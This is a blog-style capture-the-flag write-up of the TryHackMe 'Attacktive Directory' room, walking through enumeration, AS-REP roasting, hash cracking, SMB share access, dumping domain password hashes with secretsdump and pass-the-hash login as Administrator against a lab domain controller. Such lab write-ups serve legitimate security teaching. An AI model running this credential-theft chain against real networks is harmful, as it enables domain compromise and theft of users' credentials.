Attacking Active Directory — TryHackMe

Hey guys, this is a write-up for the TryHackMe room “Attacktive Directory”. On this room we are going to exploit a vulnerable Domain Controller (DC).

Prerequisite

Install: Impacket and Kerbrute

Enumeration

Starting off, we are going to use Nmap to enumerate this machine

nmap -sC -sV 10.10.2.10 -vv

Useful info:
Port 88: Kerberos-sec
Port 389: LDAP
DNS Domain: spookysec.local
DNS Computer Name: AttacktiveDirectory.spookysec.local

Enumerating Users with Kerbrute

After installing Kerbrute we are going to use the userenum command with the user list that the creator of the room provided us to find valid username on the domain.

./kerbrute userenum — dc spookysec.local -d spookysec.local ‘/root/attacktivedirectory/users.txt’ -t 100

From the results above, two important users are “svc-admin” and “backup”.

Exploitation

After enumerating we will try to exploit a feature of Kerberos with an attack called “ASReproasting”.

ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

We are going to use GetNUPusers.py tool found in the “impacket” folder to find the password hash of the user “svc-admin” from the Key Distribution Cente (KDC).

GetNUPsers.py -dc-ip 10.10.2.10 spookysec.local/svc-admin -no-pass

GetNUPsers.py Output

Then, we are going to use johnTheRipper to crack the hash

john hash — wordlist=pass.txt

Now that we have the credentials for the “svc-admin” user, we can enumerate SMB shares to check if there is any useful information.

smbclient -L \\\\10.10.2.10\\ -U svc-admin → to list shared folders

There are some common shared folders like C$, IPC$, NETLOGON, etc.

The folder “backup” seems interesting.

smbclient \\\\10.10.2.10\\backup -U svc-admin → to connect to the server using smb

Inside the folder there is an interesting file:

Inside the file there is a base64 encoded text:

echo “YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw” | base64 -d → to decode it

The results are the credentials of the user “backup@spookysec.local”.

Privilege Escalation

We are going to use a tool from impacket called secretsdumb.py. Using this tool, we are dumping the NTDS.DIT which contained the hashes of every user on the domain. Pen-testers use this tool for password auditing. They start cracking the hashes to check if the users are using a strong password.

Within impacket there is a tool called secretsdump.py that can give us all the password hashes for the users synced with Active Directory.

secretsdump.py spookeysec.local/backup:‘backup2517860’@10.10.2.10 -just-dc

We found the password hash of the local admin profile. We can use it to connect to the domain controller with administrator privileges.

We can use the method pass the hash for the local admin account because we have the local admin hash from the secredump.py we did earlier.

Pass the Hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user’s password, instead of requiring the associated plaintext password as is normally the case.

To connect to the server we can use psexec.py or evil-winrm:

psexec.py Administrator@10.10.2.10 -hashes <HASH>

OR

evil-winrm -i 10.10.2.10 -u Administrator -H <HASH>

The flags are located to the /Desktop directory of each user.

Capturing the flags brings us to the completion of the room.

--

--

--

Cybersecurity / Computer Security student. Writing is the best way to learn. Forever No0B

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Intelligence and Investigation Talent Moves (15 October)

Raspberry Pi Zero Password Thief

How to protect yourself against scams

The Decred Drive (June 25)

Automating global watchlist search, screening and monitoring

What’s next for passwords?

Hedera Hashgraph Named a Cool Vendor in the May 2020 Gartner Cool Vendors in Blockchain Technology…

Common approaches to securing Linux servers and what runs on them.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Andreas Panagi

Andreas Panagi

Cybersecurity / Computer Security student. Writing is the best way to learn. Forever No0B

More from Medium

Common Linux Privesc

Windows 10 Persistent Backdoor Using netcat

Pickle Rick Ctf Writeup

Active Reconnaissance — Nmap